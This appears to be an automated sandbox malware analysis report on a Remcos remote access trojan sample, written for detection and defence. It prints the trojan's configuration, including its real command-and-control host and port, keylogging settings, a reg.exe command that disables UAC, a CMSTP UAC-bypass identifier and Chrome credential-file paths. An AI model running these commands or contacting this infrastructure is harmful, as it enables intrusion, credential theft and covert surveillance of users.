Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
1m70ggeepT.exe

Overview

General Information

Sample name:1m70ggeepT.exe
renamed because original name is a hash value
Original sample name:06f5b8dffc6c138828adbc7f29cfc7f0.exe
Analysis ID:1417365
MD5:06f5b8dffc6c138828adbc7f29cfc7f0
SHA1:b59ef5d613a1e49c7034c3ee05780ce054ca0054
SHA256:03ba551339062106448ff58cbc393338483439513ec8439497bf47153e13f4b7
Tags:32exeRemcosRAT
Infos:

Detection

Remcos
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Contains functionality to bypass UAC (CMSTPLUA)
Detected Remcos RAT
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Remcos
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
C2 URLs / IPs found in malware configuration
Contains functionality to register a low level keyboard hook
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Contains functionalty to change the wallpaper
Creates autostart registry keys with suspicious names
Delayed program exit found
Installs a global keyboard hook
Machine Learning detection for dropped file
Machine Learning detection for sample
Uses dynamic DNS services
Abnormal high CPU Usage
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to launch a control a shell (cmd.exe)
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evaded block containing many API calls
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Wow6432Node CurrentVersion Autorun Keys Modification
Tries to load missing DLLs
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • 1m70ggeepT.exe (PID: 6544 cmdline: "C:\Users\user\Desktop\1m70ggeepT.exe" MD5: 06F5B8DFFC6C138828ADBC7F29CFC7F0)
    • svcs.exe (PID: 5528 cmdline: "C:\Users\user\AppData\Roaming\microsofts\svcs.exe" MD5: 06F5B8DFFC6C138828ADBC7F29CFC7F0)
  • svcs.exe (PID: 5864 cmdline: "C:\Users\user\AppData\Roaming\microsofts\svcs.exe" MD5: 06F5B8DFFC6C138828ADBC7F29CFC7F0)
  • svcs.exe (PID: 5324 cmdline: "C:\Users\user\AppData\Roaming\microsofts\svcs.exe" MD5: 06F5B8DFFC6C138828ADBC7F29CFC7F0)
  • svcs.exe (PID: 4616 cmdline: "C:\Users\user\AppData\Roaming\microsofts\svcs.exe" MD5: 06F5B8DFFC6C138828ADBC7F29CFC7F0)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Remcos, RemcosRATRemcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos

Malware Configuration

Threatname: Remcos

{"Host:Port:Password": "leetboy.dynuddns.net:1998:1", "Assigned name": "Remote", "Connect interval": "1", "Install flag": "Enable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "AppData", "Copy file": "svcs.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-3XK1S0", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Enable", "Hide keylog file": "Enable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
1m70ggeepT.exeJoeSecurity_RemcosYara detected Remcos RATJoe Security
    1m70ggeepT.exeJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
      1m70ggeepT.exeWindows_Trojan_Remcos_b296e965unknownunknown
      • 0x6aaa8:$a1: Remcos restarted by watchdog!
      • 0x6b020:$a3: %02i:%02i:%02i:%03i
      1m70ggeepT.exeREMCOS_RAT_variantsunknownunknown
      • 0x64afc:$str_a1: C:\Windows\System32\cmd.exe
      • 0x64a78:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
      • 0x64a78:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
      • 0x64f78:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
      • 0x657a8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
      • 0x64b6c:$str_b2: Executing file:
      • 0x65bec:$str_b3: GetDirectListeningPort
      • 0x65598:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
      • 0x65718:$str_b7: \update.vbs
      • 0x64b94:$str_b9: Downloaded file:
      • 0x64b80:$str_b10: Downloading file:
      • 0x64c24:$str_b12: Failed to upload file:
      • 0x65bb4:$str_b13: StartForward
      • 0x65bd4:$str_b14: StopForward
      • 0x65670:$str_b15: fso.DeleteFile "
      • 0x65604:$str_b16: On Error Resume Next
      • 0x656a0:$str_b17: fso.DeleteFolder "
      • 0x64c14:$str_b18: Uploaded file:
      • 0x64bd4:$str_b19: Unable to delete:
      • 0x65638:$str_b20: while fso.FileExists("
      • 0x650b1:$str_c0: [Firefox StoredLogins not found]
      1m70ggeepT.exeINDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOMDetects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)ditekSHen
      • 0x649e8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7}
      • 0x6497c:$s1: CoGetObject
      • 0x64990:$s1: CoGetObject
      • 0x649ac:$s1: CoGetObject
      • 0x6e938:$s1: CoGetObject
      • 0x6493c:$s2: Elevation:Administrator!new:

      Dropped Files

      SourceRuleDescriptionAuthorStrings
      C:\Users\user\AppData\Roaming\microsofts\svcs.exeJoeSecurity_RemcosYara detected Remcos RATJoe Security
        C:\Users\user\AppData\Roaming\microsofts\svcs.exeJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
          C:\Users\user\AppData\Roaming\microsofts\svcs.exeWindows_Trojan_Remcos_b296e965unknownunknown
          • 0x6aaa8:$a1: Remcos restarted by watchdog!
          • 0x6b020:$a3: %02i:%02i:%02i:%03i
          C:\Users\user\AppData\Roaming\microsofts\svcs.exeREMCOS_RAT_variantsunknownunknown
          • 0x64afc:$str_a1: C:\Windows\System32\cmd.exe
          • 0x64a78:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
          • 0x64a78:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
          • 0x64f78:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
          • 0x657a8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
          • 0x64b6c:$str_b2: Executing file:
          • 0x65bec:$str_b3: GetDirectListeningPort
          • 0x65598:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
          • 0x65718:$str_b7: \update.vbs
          • 0x64b94:$str_b9: Downloaded file:
          • 0x64b80:$str_b10: Downloading file:
          • 0x64c24:$str_b12: Failed to upload file:
          • 0x65bb4:$str_b13: StartForward
          • 0x65bd4:$str_b14: StopForward
          • 0x65670:$str_b15: fso.DeleteFile "
          • 0x65604:$str_b16: On Error Resume Next
          • 0x656a0:$str_b17: fso.DeleteFolder "
          • 0x64c14:$str_b18: Uploaded file:
          • 0x64bd4:$str_b19: Unable to delete:
          • 0x65638:$str_b20: while fso.FileExists("
          • 0x650b1:$str_c0: [Firefox StoredLogins not found]
          C:\Users\user\AppData\Roaming\microsofts\svcs.exeINDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOMDetects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)ditekSHen
          • 0x649e8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7}
          • 0x6497c:$s1: CoGetObject
          • 0x64990:$s1: CoGetObject
          • 0x649ac:$s1: CoGetObject
          • 0x6e938:$s1: CoGetObject
          • 0x6493c:$s2: Elevation:Administrator!new:

          Memory Dumps

          SourceRuleDescriptionAuthorStrings
          00000000.00000000.1964334212.0000000000459000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
            00000000.00000000.1964334212.0000000000459000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
              00000000.00000000.1964334212.0000000000459000.00000002.00000001.01000000.00000003.sdmpWindows_Trojan_Remcos_b296e965unknownunknown
              • 0x134a8:$a1: Remcos restarted by watchdog!
              • 0x13a20:$a3: %02i:%02i:%02i:%03i
              00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
                00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
                  Click to see the 41 entries

                  Unpacked PEs

                  SourceRuleDescriptionAuthorStrings
                  6.0.svcs.exe.400000.0.unpackJoeSecurity_RemcosYara detected Remcos RATJoe Security
                    6.0.svcs.exe.400000.0.unpackJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
                      6.0.svcs.exe.400000.0.unpackWindows_Trojan_Remcos_b296e965unknownunknown
                      • 0x6aaa8:$a1: Remcos restarted by watchdog!
                      • 0x6b020:$a3: %02i:%02i:%02i:%03i
                      6.0.svcs.exe.400000.0.unpackREMCOS_RAT_variantsunknownunknown
                      • 0x64afc:$str_a1: C:\Windows\System32\cmd.exe
                      • 0x64a78:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
                      • 0x64a78:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
                      • 0x64f78:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
                      • 0x657a8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
                      • 0x64b6c:$str_b2: Executing file:
                      • 0x65bec:$str_b3: GetDirectListeningPort
                      • 0x65598:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
                      • 0x65718:$str_b7: \update.vbs
                      • 0x64b94:$str_b9: Downloaded file:
                      • 0x64b80:$str_b10: Downloading file:
                      • 0x64c24:$str_b12: Failed to upload file:
                      • 0x65bb4:$str_b13: StartForward
                      • 0x65bd4:$str_b14: StopForward
                      • 0x65670:$str_b15: fso.DeleteFile "
                      • 0x65604:$str_b16: On Error Resume Next
                      • 0x656a0:$str_b17: fso.DeleteFolder "
                      • 0x64c14:$str_b18: Uploaded file:
                      • 0x64bd4:$str_b19: Unable to delete:
                      • 0x65638:$str_b20: while fso.FileExists("
                      • 0x650b1:$str_c0: [Firefox StoredLogins not found]
                      6.0.svcs.exe.400000.0.unpackINDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOMDetects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)ditekSHen
                      • 0x649e8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7}
                      • 0x6497c:$s1: CoGetObject
                      • 0x64990:$s1: CoGetObject
                      • 0x649ac:$s1: CoGetObject
                      • 0x6e938:$s1: CoGetObject
                      • 0x6493c:$s2: Elevation:Administrator!new:
                      Click to see the 45 entries

                      Sigma Signatures

                      System Summary

                      barindex
                      Sigma detected: CurrentVersion Autorun Keys Modification
                      Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: "C:\Users\user\AppData\Roaming\microsofts\svcs.exe", EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\1m70ggeepT.exe, ProcessId: 6544, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Rmc-3XK1S0
                      Sigma detected: Wow6432Node CurrentVersion Autorun Keys Modification
                      Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: "C:\Users\user\AppData\Roaming\microsofts\svcs.exe", EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\1m70ggeepT.exe, ProcessId: 6544, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Rmc-3XK1S0

                      Stealing of Sensitive Information

                      barindex
                      Sigma detected: Remcos
                      Source: Registry Key setAuthor: Joe Security: Data: Details: 41 59 45 C6 0C 23 96 BE 3F 05 D4 C8 42 F3 AE 34 CB A6 C7 29 46 04 E0 10 85 4F BE DE BA 80 4F 5E 3E 19 B2 E3 9F DD 80 6D D2 00 29 D2 4C 47 44 A2 A4 55 68 EB E7 02 B1 FA 6E DB 3C 36 51 D9 34 8A 6B 15 06 34 E4 2D F9 F0 D3 CA D8 DA FB 43 3C 64 22 DF 59 D6 EF 7A B0 20 BF 59 23 FD 42 BF 5D E9 16 39 A3 AD D0 E6 8E 2B , EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Roaming\microsofts\svcs.exe, ProcessId: 5528, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Rmc-3XK1S0\exepath

                      Snort Signatures

                      No Snort rule has matched

                      Joe Sandbox Signatures

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Antivirus / Scanner detection for submitted sample
                      Source: 1m70ggeepT.exeAvira: detected
                      Antivirus detection for URL or domain
                      Source: http://geoplugin.net/json.gpURL Reputation: Label: phishing
                      Source: http://geoplugin.net/json.gpURL Reputation: Label: phishing
                      Source: http://geoplugin.net/json.gp/CURL Reputation: Label: phishing
                      Source: leetboy.dynuddns.netAvira URL Cloud: Label: phishing
                      Antivirus detection for dropped file
                      Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exeAvira: detection malicious, Label: BDS/Backdoor.Gen
                      Found malware configuration
                      Source: 00000004.00000002.2147149653.00000000005C7000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: Remcos {"Host:Port:Password": "leetboy.dynuddns.net:1998:1", "Assigned name": "Remote", "Connect interval": "1", "Install flag": "Enable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "AppData", "Copy file": "svcs.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-3XK1S0", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Enable", "Hide keylog file": "Enable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
                      Multi AV Scanner detection for domain / URL
                      Source: leetboy.dynuddns.netVirustotal: Detection: 8%Perma Link
                      Source: leetboy.dynuddns.netVirustotal: Detection: 8%Perma Link
                      Multi AV Scanner detection for dropped file
                      Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exeVirustotal: Detection: 79%Perma Link
                      Multi AV Scanner detection for submitted file
                      Source: 1m70ggeepT.exeVirustotal: Detection: 79%Perma Link
                      Yara detected Remcos RAT
                      Source: Yara matchFile source: 1m70ggeepT.exe, type: SAMPLE
                      Source: Yara matchFile source: 6.0.svcs.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.0.svcs.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.svcs.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.0.1m70ggeepT.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.svcs.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.svcs.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.0.svcs.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.svcs.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.0.svcs.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.1m70ggeepT.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000000.1964334212.0000000000459000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.2146990642.0000000000459000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000002.4433601862.0000000000459000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000000.2146249448.0000000000459000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000000.1967000306.0000000000459000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000000.2227030534.0000000000459000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.2227453326.0000000000459000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000000.2066099543.0000000000459000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.2066602157.0000000000459000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: 1m70ggeepT.exe PID: 6544, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: svcs.exe PID: 5528, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: svcs.exe PID: 5864, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: svcs.exe PID: 5324, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: svcs.exe PID: 4616, type: MEMORYSTR
                      Source: Yara matchFile source: C:\Users\user\AppData\Roaming\microsofts\svcs.exe, type: DROPPED
                      Machine Learning detection for dropped file
                      Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exeJoe Sandbox ML: detected
                      Machine Learning detection for sample
                      Source: 1m70ggeepT.exeJoe Sandbox ML: detected
                      Source: C:\Users\user\Desktop\1m70ggeepT.exeCode function: 0_2_00433837 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,0_2_00433837
                      Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exeCode function: 3_2_00433837 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,3_2_00433837
                      Source: 1m70ggeepT.exe, 00000000.00000000.1964334212.0000000000459000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: -----BEGIN PUBLIC KEY-----memstr_d846d862-5

                      Exploits

                      barindex
                      Yara detected UAC Bypass using CMSTP
                      Source: Yara matchFile source: 1m70ggeepT.exe, type: SAMPLE
                      Source: Yara matchFile source: 6.0.svcs.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.0.svcs.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.svcs.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.0.1m70ggeepT.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.svcs.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.svcs.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.0.svcs.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.svcs.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.0.svcs.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.1m70ggeepT.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000000.1964334212.0000000000459000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.2146990642.0000000000459000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000002.4433601862.0000000000459000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000000.2146249448.0000000000459000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000000.1967000306.0000000000459000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000000.2227030534.0000000000459000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.2227453326.0000000000459000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000000.2066099543.0000000000459000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.2066602157.0000000000459000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1967511395.000000000076E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: 1m70ggeepT.exe PID: 6544, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: svcs.exe PID: 5528, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: svcs.exe PID: 5864, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: svcs.exe PID: 5324, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: svcs.exe PID: 4616, type: MEMORYSTR
                      Source: Yara matchFile source: C:\Users\user\AppData\Roaming\microsofts\svcs.exe, type: DROPPED

                      Privilege Escalation

                      barindex
                      Contains functionality to bypass UAC (CMSTPLUA)
                      Source: C:\Users\user\Desktop\1m70ggeepT.exeCode function: 0_2_004074FD _wcslen,CoGetObject,0_2_004074FD
                      Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exeCode function: 3_2_004074FD _wcslen,CoGetObject,3_2_004074FD
                      Source: 1m70ggeepT.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: C:\Users\user\Desktop\1m70ggeepT.exeCode function: 0_2_00409253 __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,0_2_00409253
                      Source: C:\Users\user\Desktop\1m70ggeepT.exeCode function: 0_2_0041C291 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,0_2_0041C291
                      Source: C:\Users\user\Desktop\1m70ggeepT.exeCode function: 0_2_0040C34D FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,0_2_0040C34D
                      Source: C:\Users\user\Desktop\1m70ggeepT.exeCode function: 0_2_00409665 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,0_2_00409665
                      Source: C:\Users\user\Desktop\1m70ggeepT.exeCode function: 0_2_0044E879 FindFirstFileExA,0_2_0044E879
                      Source: C:\Users\user\Desktop\1m70ggeepT.exeCode function: 0_2_0040880C __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,0_2_0040880C
                      Source: C:\Users\user\Desktop\1m70ggeepT.exeCode function: 0_2_0040783C FindFirstFileW,FindNextFileW,0_2_0040783C
                      Source: C:\Users\user\Desktop\1m70ggeepT.exeCode function: 0_2_00419AF5 FindFirstFileW,FindNextFileW,FindNextFileW,0_2_00419AF5
                      Source: C:\Users\user\Desktop\1m70ggeepT.exeCode function: 0_2_0040BB30 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,0_2_0040BB30
                      Source: C:\Users\user\Desktop\1m70ggeepT.exeCode function: 0_2_0040BD37 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,0_2_0040BD37
                      Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exeCode function: 3_2_00409253 __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,3_2_00409253
                      Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exeCode function: 3_2_0041C291 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,3_2_0041C291
                      Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exeCode function: 3_2_0040C34D FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,3_2_0040C34D
                      Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exeCode function: 3_2_00409665 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,3_2_00409665
                      Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exeCode function: 3_2_0044E879 FindFirstFileExA,3_2_0044E879
                      Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exeCode function: 3_2_0040880C __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,3_2_0040880C
                      Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exeCode function: 3_2_0040783C FindFirstFileW,FindNextFileW,3_2_0040783C
                      Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exeCode function: 3_2_00419AF5 FindFirstFileW,FindNextFileW,FindNextFileW,3_2_00419AF5
                      Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exeCode function: 3_2_0040BB30 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,3_2_0040BB30
                      Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exeCode function: 3_2_0040BD37 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,3_2_0040BD37
                      Source: C:\Users\user\Desktop\1m70ggeepT.exeCode function: 0_2_00407C97 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,0_2_00407C97

                      Networking

                      barindex
                      C2 URLs / IPs found in malware configuration
                      Source: Malware configuration extractorURLs: leetboy.dynuddns.net
                      Uses dynamic DNS services
                      Source: unknownDNS query: name: leetboy.dynuddns.net
                      Source: global trafficTCP traffic: 192.168.2.5:49704 -> 185.196.11.223:1998
                      Source: Joe Sandbox ViewASN Name: SIMPLECARRIERCH SIMPLECARRIERCH
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: C:\Users\user\Desktop\1m70ggeepT.exeCode function: 0_2_0041B380 InternetOpenW,InternetOpenUrlW,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,0_2_0041B380
                      Source: unknownDNS traffic detected: queries for: leetboy.dynuddns.net
                      Source: 1m70ggeepT.exe, svcs.exeString found in binary or memory: http://geoplugin.net/json.gp
                      Source: 1m70ggeepT.exe, svcs.exe.0.drString found in binary or memory: http://geoplugin.net/json.gp/C

                      Key, Mouse, Clipboard, Microphone and Screen Capturing

                      barindex
                      Contains functionality to register a low level keyboard hook
                      Source: C:\Users\user\Desktop\1m70ggeepT.exeCode function: 0_2_0040A2B8 SetWindowsHookExA 0000000D,0040A2A4,000000000_2_0040A2B8
                      Installs a global keyboard hook
                      Source: C:\Users\user\AppData\Roaming\microsofts\svcs.exeWindows user hook set: 0 keyboard low level C:\Users\user\AppData\Roaming\microsofts\svcs.exeJump to behavior
